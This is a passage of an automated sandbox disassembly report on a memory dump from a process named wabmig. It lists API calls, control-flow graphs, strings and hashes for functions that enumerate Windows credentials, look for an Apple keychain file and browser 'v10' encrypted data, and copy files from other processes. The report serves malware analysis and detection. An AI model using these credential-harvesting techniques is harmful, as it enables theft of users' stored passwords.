                                                                            control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 free 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 600 413e6a-413e76 596->600 597->596 602 413e46-413e5c GetProcAddress 597->602 598->599 599->580 600->592 602->596 604->583
                                                                            APIs
                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                            • memset.MSVCRT ref: 00413D7F
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                            • memset.MSVCRT ref: 00413E07
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                            • free.MSVCRT ref: 00413EC1
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                            • API String ID: 1344430650-1740548384
                                                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                            Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                            • String ID: BIN
                                                                            • API String ID: 1668488027-1015027815
                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                            Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$FirstNext
                                                                            • String ID:
                                                                            • API String ID: 1690352074-0
                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                            Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041898C
                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: InfoSystemmemset
                                                                            • String ID:
                                                                            • API String ID: 3558857096-0
                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                            Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 39 44558e-445594 call 444b06 4->39 40 44557e-44558c call 4136c0 call 41366b 4->40 19 4455e5 5->19 20 4455e8-4455f9 5->20 8 445800-445809 6->8 12 445856-44585f 8->12 13 44580b-44581e call 40a889 call 403e2d 8->13 16 445861-445874 call 40a889 call 403c9c 12->16 17 4458ac-4458b5 12->17 42 445823-445826 13->42 51 445879-44587c 16->51 21 44594f-445958 17->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 17->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 85 445685 23->85 86 4456b2-4456b5 call 40b1ab 23->86 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 49 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->49 39->3 40->39 52 44584c-445854 call 40b1ab 42->52 53 445828 42->53 182 445b08-445b15 call 40ae51 44->182 54 445c7c-445c85 45->54 55 445b38-445b96 memset * 3 45->55 150 445665-445670 call 40b1ab 49->150 151 445643-445663 call 40a9b5 call 4087b3 49->151 65 4458a2-4458aa call 40b1ab 51->65 66 44587e 51->66 52->12 67 44582e-445847 call 40a9b5 call 4087b3 53->67 61 445d1c-445d25 54->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->68 69 445b98-445ba0 55->69 74 445fae-445fb2 61->74 75 445d2b-445d3b 61->75 168 445cf5 62->168 169 445cfc-445d03 62->169 65->17 83 445884-44589d call 40a9b5 call 4087b3 66->83 138 445849 67->138 249 445c77 68->249 69->68 84 445ba2-445bcf call 4099c6 call 445403 call 445389 69->84 91 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 75->91 92 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 75->92 156 44589f 83->156 84->54 101 44568b-4456a4 call 40a9b5 call 4087b3 85->101 105 4456ba-4456c4 86->105 162 445d67-445d6c 91->162 163 445d71-445d83 call 445093 91->163 196 445e17 92->196 197 445e1e-445e25 92->197 158 4456a9-4456b0 101->158 118 4457f9 105->118 119 4456ca-4456d3 call 413cfa call 413d4c 105->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->52 150->105 151->150 153->154 154->35 156->65 158->86 158->101 174 445fa1-445fa9 call 40b6ef 162->174 163->74 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->74 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->8 218->74 253 445f9b 218->253 219->182 242->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->245 243->242 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004455C2
                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                            • memset.MSVCRT ref: 0044570D
                                                                            • memset.MSVCRT ref: 00445725
                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                            • memset.MSVCRT ref: 0044573D
                                                                            • memset.MSVCRT ref: 00445755
                                                                            • memset.MSVCRT ref: 004458CB
                                                                            • memset.MSVCRT ref: 004458E3
                                                                            • memset.MSVCRT ref: 0044596E
                                                                            • memset.MSVCRT ref: 00445A10
                                                                            • memset.MSVCRT ref: 00445A28
                                                                            • memset.MSVCRT ref: 00445AC6
                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                            • memset.MSVCRT ref: 00445B52
                                                                            • memset.MSVCRT ref: 00445B6A
                                                                            • memset.MSVCRT ref: 00445C9B
                                                                            • memset.MSVCRT ref: 00445CB3
                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                            • memset.MSVCRT ref: 00445B82
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                            • memset.MSVCRT ref: 00445986
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                            • API String ID: 2263259095-3798722523
                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                            Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                            • API String ID: 2744995895-28296030
                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                            Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040B71C
                                                                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                            • wcsrchr.MSVCRT ref: 0040B738
                                                                            • memset.MSVCRT ref: 0040B756
                                                                            • memset.MSVCRT ref: 0040B7F5
                                                                            • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                            • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                            • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                            • memset.MSVCRT ref: 0040B851
                                                                            • memset.MSVCRT ref: 0040B8CA
                                                                            • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                            • memset.MSVCRT ref: 0040BB53
                                                                            • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                            • String ID: chp$v10
                                                                            • API String ID: 4165125987-2783969131
                                                                            • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                            • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                            Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004091E2
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                            • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                            • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                            • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                            • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                            • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                            • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                            • String ID:
                                                                            • API String ID: 3715365532-3916222277
                                                                            • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                            • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                            Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                            • String ID: bhv
                                                                            • API String ID: 4234240956-2689659898
                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                            Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
